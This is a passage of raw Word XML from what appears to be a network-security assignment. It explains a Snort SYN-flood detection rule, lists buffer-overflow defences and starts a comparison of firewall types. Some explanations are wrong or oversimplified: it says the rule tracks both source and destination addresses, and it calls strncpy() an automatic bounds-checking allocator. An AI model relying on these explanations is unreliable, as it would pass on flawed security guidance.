          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(flags: S; )</w:t>
      </w:r>
      <w:r w:rsidR="005D2F85" w:rsidRPr="005D2F85">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Checks for TCP packets with the SYN flag set, indicating the initiation of a TCP connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B7688E" w14:textId="127779FC" w:rsidR="005D2F85" w:rsidRDefault="00DB603A" w:rsidP="00DB603A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="-180" w:right="-360" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D2F85" w:rsidRPr="005D2F85">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>threshold: type both, track by_src, count 100, seconds 10;</w:t>
      </w:r>
      <w:r w:rsidR="005D2F85" w:rsidRPr="005D2F85">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Defines a threshold to detect SYN Flood attacks. It specifies that both source IP and destination IP addresses should be tracked. If 100 or more SYN packets are received from the same source IP within a 10-second window, the rule will trigger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B2E9F7" w14:textId="0C8F6E6C" w:rsidR="005D2F85" w:rsidRDefault="00DB603A" w:rsidP="00DB603A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="-180" w:right="-360" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D2F85" w:rsidRPr="005D2F85">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msg: "TCP SYN Flood detected";</w:t>
      </w:r>
      <w:r w:rsidR="005D2F85" w:rsidRPr="005D2F85">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Provides a human-readable message that will be included in the generated alert.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162AF5B9" w14:textId="758BEFB6" w:rsidR="005D2F85" w:rsidRDefault="00DB603A" w:rsidP="00DB603A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="-180" w:right="-360" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D2F85" w:rsidRPr="005D2F85">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sid: 100001;</w:t>
      </w:r>
      <w:r w:rsidR="005D2F85" w:rsidRPr="005D2F85">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Specifies a unique identifier for the rule.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC30568" w14:textId="14780817" w:rsidR="005D2F85" w:rsidRDefault="00DB603A" w:rsidP="00DB603A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="-180" w:right="-360" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D2F85" w:rsidRPr="005D2F85">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rev: 1;</w:t>
      </w:r>
      <w:r w:rsidR="005D2F85" w:rsidRPr="005D2F85">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Indicates the revision number of the rule.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF2C19C" w14:textId="7A54AD0E" w:rsidR="005D2F85" w:rsidRDefault="005D2F85" w:rsidP="00DB603A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-180" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75DBCCFF" w14:textId="353EE8AE" w:rsidR="005D2F85" w:rsidRDefault="005D2F85" w:rsidP="00DB603A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-180" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2F85">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This Snort rule is designed to detect TCP SYN Flood attacks, which involve overwhelming a target system by sending a large number of SYN packets without completing the TCP handshake process. The rule tracks the number of SYN packets received from each source IP within a specific time window and </w:t>
      </w:r>
      <w:r w:rsidRPr="005D2F85">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>generates an alert if the threshold is exceeded. Upon detection, appropriate actions can be taken to mitigate the attack, such as rate limiting or implementing SYN cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4971368C" w14:textId="174682D0" w:rsidR="003F5311" w:rsidRDefault="003F5311" w:rsidP="003F5311">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-360" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="071512E6" w14:textId="0167336C" w:rsidR="003F5311" w:rsidRDefault="002B22AF" w:rsidP="006C0FAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-720" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="006C0FAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="006C0FAA" w:rsidRPr="006C0FAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Defense methods against Buffer Overflow attacks</w:t>
      </w:r>
      <w:r w:rsidR="006C0FAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5BC01E" w14:textId="06798DFA" w:rsidR="006C0FAA" w:rsidRDefault="002D44EC" w:rsidP="006C0FAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-360" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The defenses against buffer overflow attacks are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00485A75" w14:textId="79171774" w:rsidR="002D44EC" w:rsidRDefault="002D44EC" w:rsidP="002D44EC">
      <w:pPr>
        <w:ind w:right="-360" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1.  Input Validation and Bounds Checking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EBBD4F" w14:textId="74E84070" w:rsidR="002D44EC" w:rsidRDefault="002B70B2" w:rsidP="002B70B2">
      <w:pPr>
        <w:ind w:left="-90" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B70B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Implementing proper input validation and bounds checking is a fundamental defense against buffer overflow attacks. This involves carefully validating and sanitizing user input to ensure it conforms to expected boundaries and formats. By enforcing input length limits and checking array boundaries, developers can prevent buffer overflows from occurring. Additionally, using secure coding practices and language features that automatically handle buffer overflow checks, such as safe string functions, can provide an added layer of protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFCED18" w14:textId="075A2AA7" w:rsidR="002B70B2" w:rsidRDefault="002B70B2" w:rsidP="002B70B2">
      <w:pPr>
        <w:ind w:left="-90" w:right="-360" w:hanging="270"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.  Address Space Layout Randomization (ASLR):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2922F51A" w14:textId="60EE6029" w:rsidR="002B70B2" w:rsidRDefault="002B70B2" w:rsidP="002B70B2">
      <w:pPr>
        <w:ind w:left="-90" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B70B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ASLR is a defense technique that randomizes the memory layout of a process, making it difficult for attackers to predict the memory addresses of specific functions or variables. By randomizing the address space, ASLR reduces the predictability of memory locations and makes it harder for attackers to exploit buffer overflow vulnerabilities. This mitigation technique adds an extra hurdle for attackers, as they need to guess or discover the correct addresses to successfully exploit a buffer overflow vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EBF1C4" w14:textId="4D28D293" w:rsidR="002B70B2" w:rsidRDefault="002B70B2" w:rsidP="002B70B2">
      <w:pPr>
        <w:ind w:left="-90" w:right="-360" w:hanging="270"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.  Writing Correct Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1AE606" w14:textId="77777777" w:rsidR="002B70B2" w:rsidRPr="002B70B2" w:rsidRDefault="002B70B2" w:rsidP="002B70B2">
      <w:pPr>
        <w:ind w:left="-90" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B70B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Writing correct and secure code is an essential defense method against buffer overflow attacks. By following secure coding practices, developers can significantly reduce the likelihood of introducing vulnerabilities that can be exploited for buffer overflows. Some key principles to consider include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F73A9D" w14:textId="77777777" w:rsidR="002B70B2" w:rsidRPr="002B70B2" w:rsidRDefault="002B70B2" w:rsidP="002B70B2">
      <w:pPr>
        <w:ind w:left="-90" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B70B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a. Input Validation: Thoroughly validate and sanitize user input to ensure it meets expected criteria, such as length limits and expected data types. Reject or sanitize any input that exceeds the expected boundaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689068FB" w14:textId="77777777" w:rsidR="002B70B2" w:rsidRPr="002B70B2" w:rsidRDefault="002B70B2" w:rsidP="002B70B2">
      <w:pPr>
        <w:ind w:left="-90" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B70B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">b. Proper Memory Allocation: Allocate memory dynamically and ensure that the allocated memory is sufficient to hold the expected data. Use functions that automatically handle memory allocation and bounds checking, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="002B70B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>strncpy()</w:t>
      </w:r>
      <w:r w:rsidRPr="002B70B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of </w:t>
      </w:r>
      <w:r w:rsidRPr="002B70B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>strcpy()</w:t>
      </w:r>
      <w:r w:rsidRPr="002B70B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32233D00" w14:textId="72463174" w:rsidR="002B70B2" w:rsidRDefault="002B70B2" w:rsidP="002B70B2">
      <w:pPr>
        <w:ind w:left="-90" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B70B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">c. Use Secure Functions: Utilize secure string manipulation functions, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="002B70B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>strncpy()</w:t>
      </w:r>
      <w:r w:rsidRPr="002B70B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="002B70B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>strncat()</w:t>
      </w:r>
      <w:r w:rsidRPr="002B70B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, that allow developers to specify the maximum number of characters to copy or concatenate, thereby preventing buffer overflows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E43112" w14:textId="421C1B5D" w:rsidR="002B70B2" w:rsidRDefault="002B70B2" w:rsidP="002B70B2">
      <w:pPr>
        <w:ind w:left="-90" w:right="-360" w:hanging="270"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.  Non-executable Buffers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B528943" w14:textId="508F819C" w:rsidR="002B70B2" w:rsidRDefault="002B70B2" w:rsidP="002B70B2">
      <w:pPr>
        <w:ind w:left="-90" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B70B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Enforcing non-executable buffers is another defense mechanism against buffer overflow attacks. Modern operating systems and processors support memory protection mechanisms that allow the marking of certain memory regions as non-executable. By designating buffers as non-executable, even if an attacker manages to overflow a buffer and inject malicious code, the processor will prevent the execution of that code from the buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6C26A6" w14:textId="531C8C10" w:rsidR="002B70B2" w:rsidRDefault="002B70B2" w:rsidP="002B70B2">
      <w:pPr>
        <w:ind w:left="-360" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B70B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>These defense methods, when combined, can significantly reduce the risk of buffer overflow attacks. It is important to implement a layered approach to security, incorporating secure coding practices, input validation, and additional security measures such as ASLR, to enhance the overall security posture of an application or system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093618E2" w14:textId="6BF34066" w:rsidR="00E036C5" w:rsidRDefault="00E036C5" w:rsidP="002B70B2">
      <w:pPr>
        <w:ind w:left="-360" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DFA84DE" w14:textId="54172D4B" w:rsidR="008E01BA" w:rsidRDefault="008E01BA" w:rsidP="00B90614">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360" w:hanging="450"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.  </w:t>
      </w:r>
      <w:r w:rsidR="00BC5903" w:rsidRPr="009E6B1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Difference</w:t>
      </w:r>
      <w:r w:rsidR="009E6B1B" w:rsidRPr="009E6B1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> between packet-filtering firewalls, stateful inspection firewalls, circuit-level firewalls, and application firewalls</w:t>
      </w:r>
      <w:r w:rsidR="009E6B1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18317196" w14:textId="2C21E1C0" w:rsidR="00B90614" w:rsidRDefault="00CD4B1B" w:rsidP="00B90614">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4B1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>he difference between packet-filtering firewalls, stateful inspection firewalls, circuit-level firewalls, and application firewalls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> are as below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1914EA2D" w14:textId="77777777" w:rsidR="00CD4B1B" w:rsidRPr="00CD4B1B" w:rsidRDefault="00CD4B1B" w:rsidP="00CD4B1B">
      <w:pPr>
